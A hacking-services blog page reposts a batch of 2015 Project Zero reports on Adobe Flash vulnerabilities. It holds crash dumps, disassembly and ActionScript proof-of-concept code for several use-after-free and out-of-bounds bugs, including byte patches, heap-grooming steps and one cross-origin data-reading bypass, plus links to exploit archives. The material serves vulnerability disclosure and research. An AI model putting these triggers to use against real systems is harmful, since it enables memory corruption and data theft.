Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863143878

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=378&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

We've hit the same bug from two different avenues:

1) A report to the Chromium bug tracker: https://code.google.com/p/chromium/issues/detail?id=485893

2) The new Flash fuzzing collaboration between Mateusz, Chris, Ben.

For 1), here are the details (there's also an attachment):

---
VULNERABILITY DETAILS

This is a OOB read vulnerability when processing the SCRIPTDATASTRING object in Flv file.


VERSION
Chrome Version: 42.0.2311.135 
Operating System: Windows 7

REPRODUCTION CASE

See attached file

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION

Type of crash: 
Tab

Crash State: 

[WARNING:..\..\..\..\flash\platform\pepper\pep_module.cpp(63)] SANDBOXED
(e38.c34): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000006 ebx=003ff0b0 ecx=000ff000 edx=05110000 esi=00000000 edi=00000000
eip=63be351a esp=003ff06c ebp=003ff080 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\PepperFlash\pepflashplayer.dll - 
pepflashplayer!PPP_ShutdownBroker+0x162327:
63be351a 0fb632          movzx   esi,byte ptr [edx]         ds:002b:05110000=??
4:064> k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
003ff080 63be379e pepflashplayer!PPP_ShutdownBroker+0x162327
003ff0b4 63cfd02e pepflashplayer!PPP_ShutdownBroker+0x1625ab
003ff0ec 63b3c609 pepflashplayer!PPP_ShutdownBroker+0x27be3b
003ff13c 63cf6d58 pepflashplayer!PPP_ShutdownBroker+0xbb416
003ff14c 63cf6fbc pepflashplayer!PPP_ShutdownBroker+0x275b65
003ff35c 63d11691 pepflashplayer!PPP_ShutdownBroker+0x275dc9
003ff368 63d116d6 pepflashplayer!PPP_ShutdownBroker+0x29049e
003ff4b4 63d0d842 pepflashplayer!PPP_ShutdownBroker+0x2904e3
003ff4fc 63cf99a3 pepflashplayer!PPP_ShutdownBroker+0x28c64f
003ff550 63b94728 pepflashplayer!PPP_ShutdownBroker+0x2787b0
003ff574 63ff0933 pepflashplayer!PPP_ShutdownBroker+0x113535
00000000 00000000 pepflashplayer!PPP_ShutdownBroker+0x56f740
---

For 2), there's a .tar file with a repro SWF in it (may not reproduce outside of analysis tools because it is an OOB read).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37862.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=377&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=487237]

Credit is to bilou, working with the Chromium Vulnerability Reward Program

---
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. 
This is almost a repost of  Issue 457680  due to a patch failure.

VERSION
Chrome Version: N/A now, Flash StandAlone Debug 17.0.0.188
Operating System: [Win7 x64 SP1]

REPRODUCTION CASE
The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available).

After compiling mapBitmap_v2_as2.swf, I had to change the bytes at offset 0x92B in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)

The description is exactly the same as in  Issue 457680  so I won't repost it. Here are just my comments on the patch.
They basically added a marker at offset +0xDC in the flash standalone debugger (the standalone player is not available at the time of writing):

.text:005AD629 loc_5AD629:
.text:005AD629                 lea     ecx, [esi+0DCh]
.text:005AD62F                 push    edi
.text:005AD630                 mov     [ebp+1C4h+var_198], ecx
.text:005AD633                 call    xsetUseMarker

.text:0059F762                 cmp     byte ptr [ecx], 0   ; is the marker present?
.text:0059F765                 jz      short loc_59F77B
.text:0059F767                 cmp     [esp+arg_0], 0      ; is 0 provided?
.text:0059F76C                 jz      short locret_59F77E 
.text:0059F76E                 mov     ecx, dword_EE4788   ; kill the program
.text:0059F774                 call    sub_9798C0
.text:0059F779                 jmp     short locret_59F77E
.text:0059F77B
.text:0059F77B loc_59F77B:
.text:0059F77B                 mov     byte ptr [ecx], 1   ; else set the marker
.text:0059F77E
.text:0059F77E locret_59F77E:
.text:0059F77E                 retn    4


That marker is then removed when we exit the BitmapData dispatcher:

.text:005AEF29                 mov     eax, [ebp+1C4h+var_198] ; jumptable 005AD654 default case
.text:005AEF2C                 mov     byte ptr [eax], 0


So, to trigger again the issue, we just have to put an extra call to getPixel32 for example:

var o = new Object()
o.valueOf = function () {
    bd.getPixel32(1,4)          // remove the marker :)
	f()
	for (var i = 0; i<0x10;i++) {
		var tf:TextFormat = new TextFormat()
		tf.tabStops = b
		a[i] = tf
	}
	return 4
}

bd.getPixel32(o,4)


And we're done :)
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37861.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.

VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1

REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):

.text:004B82D0                 push    esi
.text:004B82D1                 mov     esi, [esp+4+arg_0]
.text:004B82D5                 push    edi
.text:004B82D6                 mov     edi, ecx
.text:004B82D8                 mov     ecx, [edi+94h]  ; edi points to freed memory
.text:004B82DE                 and     ecx, 0FFFFFFFEh
.text:004B82E1                 add     ecx, 3Ch
.text:004B82E4                 mov     eax, esi
.text:004B82E6                 call    sub_4B0724      ; crash below
...
.text:004B0724                 mov     edx, [ecx]      ; crash here ecx = 3ch (null pointer)
.text:004B0726                 cmp     edx, [eax]
.text:004B0728                 jnz     short loc_4B077E


Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
	tf.removeTextField()
	return 0x41414142
}

var c = new Color(tf)
c.setRGB(o)
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=365&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

If a watch is set on the childNodes object of an XML object, and then the XML object is manipulated in a way that causes its child nodes to be enumerated, the watch will trigger. If the function in the watch deletes all the child nodes, the buffer containing the nodes will be deleted, even though the original function will still access it when it unwinds. This can lead to a childnodes array in ActionScript containing pointers that can be specified by an attacker. A minimal POC is as follows:

var doc:XML = new XML(); 
var rootNode:XMLNode = doc.createElement("rootNode");  
var oldest:XMLNode = doc.createElement("oldest"); 
var middle:XMLNode = doc.createElement("middle"); 
var youngest:XMLNode = doc.createElement("youngest"); 
var youngest1:XMLNode = doc.createElement("youngest1"); 
var youngest2:XMLNode = doc.createElement("youngest2"); 
var youngest3:XMLNode = doc.createElement("youngest3"); 
 
// add the rootNode as the root of the XML document tree 
doc.appendChild(rootNode); 
 
// add each of the child nodes as children of rootNode 
rootNode.appendChild(oldest); 
rootNode.appendChild(middle); 
rootNode.appendChild(youngest1);
rootNode.appendChild(youngest2);
rootNode.appendChild(youngest3);
 
// create an array and use rootNode to populate it 
var firstArray:Array = rootNode.childNodes; 
trace (firstArray.length);

firstArray[0] = "test";
firstArray.watch("length", f);
rootNode.appendChild(youngest);

function f(a, b){
	
	trace("in f " + a + " " + b + " " + c);
	if(b == 1){
	firstArray.unwatch("length");
	middle.removeNode();
	oldest.removeNode();
	youngest1.removeNode();
	youngest2.removeNode();
	youngest3.removeNode();
	youngest.removeNode();
	}
	
	
	for(var i = 0; i < 100; i++){
		var b = new flash.display.BitmapData(100, 1000, true, 1000);
		var c = "aaaaaaaaaaaaa";
	}
	
		trace("end length " + rootNode.childNodes.length);	
	}

A sample fla and swf are also attached.	

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37859.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=363&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The following access violation was observed in the Adobe Flash Player plugin:

(1ba8.1c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
eax=0004c800 ebx=00000000 ecx=08982000 edx=00002588 esi=00001200 edi=0042d46c
eip=017723c0 esp=0042d278 ebp=0042d3c4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0:
017723c0 8b0408          mov     eax,dword ptr [eax+ecx] ds:002b:089ce800=????????

0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0042d3c4 0177cfaf 0042d3e0 0042d46c 00000001 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0
0042d3ec 0177d112 0042d414 0042d46c 00001376 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x300df
0042d424 0177d4c2 0042d454 0042d46c 00000006 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x30242
0042d4e0 0176ec7a 00000000 0042d540 03497440 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x305f2
0042d544 01788715 08875020 47535542 6c61746e FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x21daa
0042d7d8 01775c95 0042d814 01775f31 01775f41 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x3b845
0042d7e0 01775f31 01775f41 03497440 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x28dc5
0042d828 017834d2 03497440 00000000 00000030 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x29061
00000000 00000000 00000000 00000000 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x36602

0:000> db ecx
08982000  35 00 00 00 01 00 00 00-00 00 00 00 00 00 00 ff  5...............
08982010  00 00 00 00 00 00 00 00-01 00 00 00 00 00 00 00  ................
08982020  80 a4 b7 01 00 00 00 00-00 00 00 00 00 10 00 00  ................
08982030  00 00 00 00 18 a8 b7 01-20 50 87 08 00 00 00 00  ........ P......
08982040  03 30 02 00 49 00 00 00-01 00 00 00 00 00 00 00  .0..I...........
08982050  00 00 00 ff 00 00 00 00-00 00 00 00 01 00 00 00  ................
08982060  00 00 00 00 80 a4 b7 01-00 00 00 00 00 00 00 00  ................
08982070  00 10 00 00 00 00 00 00-18 a8 b7 01 20 50 87 08  ............ P..

0:000> !address ecx
[...]
Usage:                  <unknown>
Base Address:           08906000
End Address:            08990000
Region Size:            0008a000
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
Type:                   00020000	MEM_PRIVATE
Allocation Base:        087f0000
Allocation Protect:     00000001	PAGE_NOACCESS

Notes:

- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.

- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ECX".

- The 32-bit value read from the unmapped memory address is in fact a pointer, and is used to immediately read 12 bytes from in one function up the call chain.

- Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37858.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=362&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The following access violation was observed in the Adobe Flash Player plugin:

(1dec.1af0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
eax=00006261 ebx=00001501 ecx=010ae1e4 edx=00006262 esi=0736dda0 edi=05a860d0
eip=0044ae55 esp=010ae170 ebp=010ae564 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
FlashPlayer!WinMainSandboxed+0x57aee:
0044ae55 803c3000        cmp     byte ptr [eax+esi],0       ds:002b:07374001=??

0:000> !address esi
[...]
Usage:                  <unknown>
Base Address:           06e60000
End Address:            07374000
Region Size:            00514000
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
Type:                   00020000	MEM_PRIVATE
Allocation Base:        06e60000
Allocation Protect:     00000001	PAGE_NOACCESS

0:000> db esi
0736dda0  8e 56 fa 1b 00 13 e3 85-00 0c 54 72 65 62 75 63  .V........Trebuc
0736ddb0  68 65 74 20 4d 53 3e 00-7e 00 80 00 9f 00 21 01  het MS>.~.....!.
0736ddc0  4c 01 76 01 85 01 97 01-e9 01 02 02 40 02 9a 02  L.v.........@...
0736ddd0  c4 02 1d 03 49 03 d8 03-26 04 4f 04 b5 04 fd 04  ....I...&.O.....
0736dde0  1d 05 39 05 90 05 b1 05-e2 05 f6 05 22 06 40 06  ..9.........".@.
0736ddf0  97 06 da 06 2d 07 94 07-ac 07 d8 07 02 08 21 08  ....-.........!.
0736de00  3f 08 af 08 fb 08 40 09-92 09 e2 09 1c 0a c9 0a  ?.....@.........
0736de10  00 0b 35 0b 5b 0b 77 0b-cd 0b 04 0c 52 0c 9d 0c  ..5.[.w.....R...

Notes:

- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.

- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ESI".

- The memory under "ESI" contains a section of the input file starting at offset 0x50dda0.

- Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37857.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=361&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The following access violation was observed in the Adobe Flash Player plugin:

(150c.ca0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
eax=078a53b7 ebx=00f28938 ecx=002dea24 edx=000085ed esi=000085ee edi=09d9eee0
eip=0139a657 esp=002de9b4 ebp=002deda4 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
FlashPlayer!WinMainSandboxed+0x572f0:
0139a657 8a0402          mov     al,byte ptr [edx+eax]      ds:002b:078ad9a4=??

0:000> !address eax
[...]
Usage:                  <unknown>
Base Address:           07560000
End Address:            078ad000
Region Size:            0034d000
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
Type:                   00020000	MEM_PRIVATE
Allocation Base:        07560000
Allocation Protect:     00000001	PAGE_NOACCESS

0:000> db eax
078a53b7  c5 ea 85 00 00 b6 19 00-38 01 c5 3d 84 9e c2 3d  ........8..=...=
078a53c7  2f 48 d5 a0 2b 00 73 65-63 6f 6e 64 00 00 00 03  /H..+.second....
078a53d7  00 00 00 01 00 00 00 01-00 00 00 00 02 00 00 00  ................
078a53e7  b7 01 00 00 88 39 00 0a-00 74 68 69 73 00 5f 78  .....9...this._x
078a53f7  00 78 6d 00 5f 79 00 79-6d 00 5f 72 6f 6f 74 00  .xm._y.ym._root.
078a5407  66 69 72 73 74 73 00 63-6c 61 75 73 00 68 70 00  firsts.claus.hp.
078a5417  72 65 6d 6f 76 65 4d 6f-76 69 65 43 6c 69 70 00  removeMovieClip.
078a5427  96 02 00 08 00 1c 96 04-00 08 01 08 00 1c 96 02  ................

Notes:

- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.

- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EDX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "EAX".

- The memory under "EAX" contains a section of the input file starting at offset 0x3453b7.

- The index (EDX) value originates from offset 0x3453b8 in the file (at 1 byte offset relative to the EAX memory region).

- Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37856.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=360&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

In certain cases where a native AS2 class sets an internal atom to a value, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.uri, this issue occurs in several other 

A proof of concept is as follows:

var s = SharedObject.getLocal("test");

ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop  :"natalie", myprop2 : "test"};
var n = new NetConnection();

s.data.uri = q;
trace("uri " + s.data.uri);
s.flush();
ASnative(2100, 200)(s.data);

trace("uri " + s.data.uri);
n.connect.call(s.data, xx);
trace(s.data.uri);
s = 1;
var a = [];
var c = [];
for(i = 0; i < 200; i++){
	
	var b = new flash.display.BitmapData(1000, 1000, true, 10);
}

setInterval(f, 1000);

function f(){
	
	ASnative(252, 1).call(q); //Array push
	
	}

A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37855.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]

---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains 
in the stack

VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]

REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.

These lines come from flashplayer standalone 17.0.0.169:

.text:00597F45 loc_597F45:
.text:00597F45                 cmp     eax, 6
.text:00597F48                 jnz     loc_597FE5
.text:00597F4E                 mov     ecx, esi           ; esi points to the MovieClip object
.text:00597F50                 call    sub_40C1ED
.text:00597F55                 add     eax, 30Ch
.text:00597F5A                 or      dword ptr [eax], 8
.text:00597F5D                 mov     eax, [ebx]
.text:00597F5F                 mov     byte ptr [eax+82Ch], 1
.text:00597F66                 mov     ecx, [ebx]
.text:00597F68                 lea     eax, [ebp+74h+var_1C0]
.text:00597F6E                 push    eax
.text:00597F6F                 push    dword ptr [ebx+0Ch]
.text:00597F72                 call    xfetchRectangleProperties  ; get the Rectangle properties, and execute some AS2
.text:00597F77                 test    al, al
.text:00597F79                 jz      loc_598274
.text:00597F7F                 mov     edi, [ebp+74h+var_1C0]
.text:00597F85                 mov     ecx, esi
.text:00597F87                 imul    edi, 14h
.text:00597F8A                 call    sub_40C1ED          ; reference freed memory and return a bad 

pointer
.text:00597F8F                 mov     [eax+310h], edi     ; crash here, eax = 0



Poc (compile with Flash CS5.5):

import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
	_global.mc.createTextField("newtf",1,1,1,2,3)
	return 7
}
var o = {x:o2,y:0,width:4,height:5}

_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680]

---
VULNERABILITY DETAILS
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. 

VERSION
Chrome Version: 40.0.2214.111 stable, Flash 16.0.0.305
Operating System: Win7 SP1 x64]

The AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344.


Here are a few steps to trigger the issue:

1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.
2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter.
3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns.
4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property.
5) Use the first BitmapData and call getPixel32(o).

What happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D:

CPU Disasm
Address   Hex dump          Command        
6D2D3FBB    68 BE27C66D     PUSH OFFSET 6DC627BE
6D2D3FC0    FF73 04         PUSH DWORD PTR DS:[EBX+4]
6D2D3FC3    56              PUSH ESI
6D2D3FC4    8B33            MOV ESI,DWORD PTR DS:[EBX]
6D2D3FC6    E8 A572F8FF     CALL 6D25B270                 ; that function creates a new atom and calls the BitmapData constructor
6D2D3FCB    84C0            TEST AL,AL
6D2D3FCD    74 09           JE SHORT 6D2D3FD8
6D2D3FCF    8B0B            MOV ECX,DWORD PTR DS:[EBX]
6D2D3FD1    6A 01           PUSH 1  
6D2D3FD3    E8 281A0100     CALL 6D2E5A00                 ; if the constructor is overriden by a custom class, the custom constructor is called here
6D2D3FD8    8B75 08         MOV ESI,DWORD PTR SS:[EBP+8]
6D2D3FDB    8B13            MOV EDX,DWORD PTR DS:[EBX]
6D2D3FDD    56              PUSH ESI
6D2D3FDE    E8 418EF6FF     CALL 6D23CE24                 ; then pop the new atom from the AS2 stack
...
6D2D4000    23F8            AND EDI,EAX
6D2D4002    807F 35 1B      CMP BYTE PTR DS:[EDI+35],1B   ; and ensure this is indeed a BitmapData
6D2D4006    74 0A           JE SHORT 6D2D4012
...

In the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter:

6D2D4012    8B47 28         MOV EAX,DWORD PTR DS:[EDI+28]
6D2D4015    83E0 FE         AND EAX,FFFFFFFE
6D2D4018    8B40 18         MOV EAX,DWORD PTR DS:[EAX+18]  ; get the BitmapData object 
6D2D401B    33C9            XOR ECX,ECX
6D2D401D    51              PUSH ECX
6D2D401E    E8 1DB2FEFF     CALL 6D2BF240                  ; call the BitmapData destructor
6D2D4023    8B75 10         MOV ESI,DWORD PTR SS:[EBP+10]
6D2D4026    8BC7            MOV EAX,EDI
6D2D4028    E8 134AF6FF     CALL 6D238A40                  ; and associate the DisplacementMapFilter.mapBitmap object


All of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32.

After compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)

Hopefully if it works we should crash here with eax controlled:
CPU Disasm
Address   Hex dump          Command
6D2BFA83    3B58 0C         CMP EBX,DWORD PTR DS:[EAX+0C]      //eax = 0x41424344
6D2BFA86    7D 57           JGE SHORT 6D2BFADF
6D2BFA88    85FF            TEST EDI,EDI
6D2BFA8A    78 53           JS SHORT 6D2BFADF
6D2BFA8C    3B78 08         CMP EDI,DWORD PTR DS:[EAX+8]
6D2BFA8F    7D 4E           JGE SHORT 6D2BFADF
6D2BFA91    8BC8            MOV ECX,EAX
6D2BFA93    8B01            MOV EAX,DWORD PTR DS:[ECX]
6D2BFA95    8B50 10         MOV EDX,DWORD PTR DS:[EAX+10]
6D2BFA98    FFD2            CALL EDX

I don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible.


***************************************************************************
Content of MyBitmapData.as

class MyBitmapData extends String
{
	static var mf;
	function MyBitmapData()
	{
		super();
        var a = MyBitmapData.mf
        test(a,a,a,a,a,a,a,a)                         //that part should be deleted manually in the bytecode
        trace(a)                                      //so that MyBitmapData.mf stays on top of the AS2 stack
	}
	public function test(a,b,c,d,e,f,g,h) {
    
    }
	static function setBitmapData(myfilter)
	{
		mf = myfilter;
	}
}

***************************************************************************
Content of mapBitmap_as2.fla

import flash.filters.DisplacementMapFilter;
import flash.display.BitmapData;

var bd:BitmapData = new BitmapData(10,10)
MyBitmapData.setBitmapData(bd)
var bd2:BitmapData = new BitmapData(10,10)
var dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4)

newConstr = MyBitmapData
flash.display.BitmapData = newConstr

function f() {
	var a = dmf.mapBitmap;
}
var a:Array = new Array()
var b:Array = new Array()
for (var i = 0; i<0xC8/4;i++) {
	b[i] = 0x41424344
}

var o = new Object()
o.valueOf = function () {
	f()
	for (var i = 0; i<0x10;i++) {
		var tf:TextFormat = new TextFormat()
		tf.tabStops = b
		a[i] = tf
	}
	return 4
}

bd.getPixel32(o,4)
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37853.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=355&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

In certain cases where a native AS2 class sets an internal variable, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.contentType, this applies to several other variables including many proprties of the Sound and NetStream classes.

A proof of concept is as follows:

var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var o = {myprop: "test", myprop2: "test"};
s.data.contentType = o;
flush();
ASnative(2100, 200)(s.data); // new NetConnection
trace(s.data.contentType);
s = 1;

//Do GC

for(var i = 0; i < 100; i++){
	
	var b = new flash.display.BitmapData(100, 1000, true, 1000);
	
	}

setInterval(c, 1000);
function c(){
	ASnative(252, 1).call(o); //Array push

}

A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37852.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[90-day deadline tracking for https://code.google.com/p/chromium/issues/detail?id=481639]

---
An instance of ActionScript's Sound class allows for loading and extracting for further processing any kind of external data, not only sound files. Same-origin policy doesn't apply here. Each input byte of raw data, loaded previously from given URL, is encoded by an unspecified function to the same 8 successive sample blocks of output. The sample block consists of 8 bytes (first 4 bytes for left channel and next 4 bytes for right channel). Only 2 bytes from 8 sound blocks (64 bytes) are crucial, the rest 52 bytes are useless. Each byte of input from range 0-255 has corresponding constant unsigned integer value (a result of encoding), so for decoding purposes you can use simply lookup table (cf. source code from BoundlessTunes.as).

1. Put attached file BoundlessTunes.swf on the HTTP server.
2. Open http://<SERVER_HOSTNAME>/BoundlessTunes.swf?url=<URL> where <URL> is an URL address (e.g. leading to cross-origin resource). A received response will be displayed in alert window.
---

Proof of Concept:
